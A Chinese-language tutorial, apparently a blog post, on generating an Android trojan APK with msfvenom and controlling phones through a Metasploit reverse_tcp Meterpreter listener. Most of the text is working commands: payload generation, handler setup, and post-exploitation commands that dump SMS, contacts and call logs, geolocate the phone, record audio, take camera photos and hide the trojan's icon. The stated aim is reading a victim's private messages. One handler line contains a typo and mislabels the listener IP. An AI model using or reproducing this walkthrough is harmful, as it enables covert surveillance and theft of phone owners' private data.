生成远控木马，远程控制安卓手机

msfvenom安卓木马apk

msfvenom 是一种命令行程序工具，用于生成各种类型的恶意软件（也称为恶意代码或恶意负载）。它可以用于渗透测试或入侵检测，以了解网络系统的漏洞和弱点，并为进一步的安全优化提供信息。该工具的名称来源于其容器架构，即 Metasploit 框架和 venom 引擎。

不用电脑，在手机kali上使用msfvenom生成木马安卓木马app

监听局域网环境下，安卓设备手机隐私信息

现在安全一点儿得安卓系统，就是小米手机MIUI了
在用户隐私信息读取权限控制得很好`，可防止一下恶意app读取手机里各种信息
比如：`短信，通讯录，相机，状态，等等

安装msfvenom

apt-get install metasploit-framework

耐心等待安装完成

开始成木马apk

后面加上你kali 局域网IP，自定义端口号，和apk生成路径

msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的IP LPORT=8986 R > /root/Android.apk

使用模块开始监听

启动msfconsole

msfconsole

加载模块

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

设置IP

后面加上靶机IP

sei LHOST 靶机IP

设置端口

set LPORT 8986

监听刚才设置得 8986端口
本机防火墙，一定开启8986端

开始执行监听

exploit

安装app

这个时候把生成得apk，安装到手机上
在同一局域网环境下，打开app

手机成功上线

部分命令

输入 ? 号或者 help 查看更多命令

ls 查看手机当前目录下文件
pwd 显示手机当前路径
cd /sdcard 到手机存储文件夹下
#DCIM 文件夹是存放 照片 视频

webcam_list 打开摄像头
record_mic 音频录制
webcam_chat 查看摄像头接口
webcam_snap 拍照
hide_app_icon 隐藏手机端木马图标
dump_callog 获取通话记录
geolocate 获取手机坐标
dump_contacts 导出电话号码
webcam_stream 开摄像头
sysinfo 查看手机信息
dump_sms 导出短信信息

查看dump生成手机信息文件

exit
exit
exit
#退出监听 

ls -l
#查看当前目录下文件
dump开通得就是 生成手机信息文件了

cat ./文件名字
#cat查看文件

手机短信已全部读取到